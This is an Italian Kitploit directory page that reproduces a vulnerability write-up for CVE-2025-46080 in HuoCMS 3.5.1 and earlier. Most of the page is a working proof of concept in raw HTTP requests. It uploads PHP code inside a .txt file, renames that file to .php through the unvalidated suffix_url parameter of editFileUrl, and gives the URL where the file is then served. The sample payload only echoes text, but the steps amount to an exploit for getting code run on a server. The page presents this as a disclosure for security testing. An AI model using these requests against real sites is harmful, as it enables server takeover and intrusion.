Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-46080 — Dettagli | Kitploit
Strumenti/GitHubGitHub/yggcwhat/cve-2025-46080
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebSicurezza WebConfigurazione Errata
GitHubyggcwhat/cve-2025-46080

CVE-2025-46080

Dettagli

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

BUG_Author:

yggcwhat

Versione interessata:

Huocms

Fornitore:

https://huocms.com/

Indirizzo del codice sorgente:

https://gitee.com/digital-flag/huocms

File della vulnerabilità:

AttachmentController.php

Versione interessata:

HuoCMS - <=V3.5.1

Descrizione:

app ->controller ->backend -> AttachmentController.php:editFileUrl()

Il suffisso di $newPathUrl nella funzione "copy" chiamata nel metodo "editFileUrl" non è verificato dalla whitelist, il che può essere sfruttato per modificare il nome del file. Il suffisso è controllato dal parametro suffix_url passato ed è controllabile.

image

Passaggio 1: caricare in anticipo un file con un suffisso consentito che contiene contenuto dannoso e registrare allo stesso tempo l'ID del file.

root@kitploit:~
POST /attachment/uploadAndSave HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization:  token
Content-Type: multipart/form-data; boundary=----geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Length: 581
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin.php/Index/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="type"

2
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="attachment_cate_id"

0
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="reduce_img"


------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

<?php
echo "hello word!"
?>
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9--

image

In base al contenuto, l'ID risulta essere 67.

Passaggio 2: costruire quindi una richiesta basata su editFileUrl e rinominare il file con id 67, dove la funzione copy all'interno di editFileUrl (vulnerabile) viene chiamata per rinominare il file con un suffisso non consentito.

root@kitploit:~
POST /attachment/editFileUrl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Authorization: token
Content-Length: 83
Origin: http://127.0.0.1
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

id=67&name=test&prefix_url=&suffix_url=file/20250416/test.php&description=123123123

image

Nota: per modificarlo di nuovo, devi cambiare il nome del file di suffix_url per bypassare la funzione copy attivata da $oldPathUrl != $newPathUrl all'interno di editFileUrl.

URL di accesso: http://127.0.0.1/storage/file/20250416/test.php

image

Riferimenti:

http://huocms.com https://github.com/yggcwhat/CVE-2025-46080/edit/main/README.md https://www.huocms.com/

Scarica lo strumento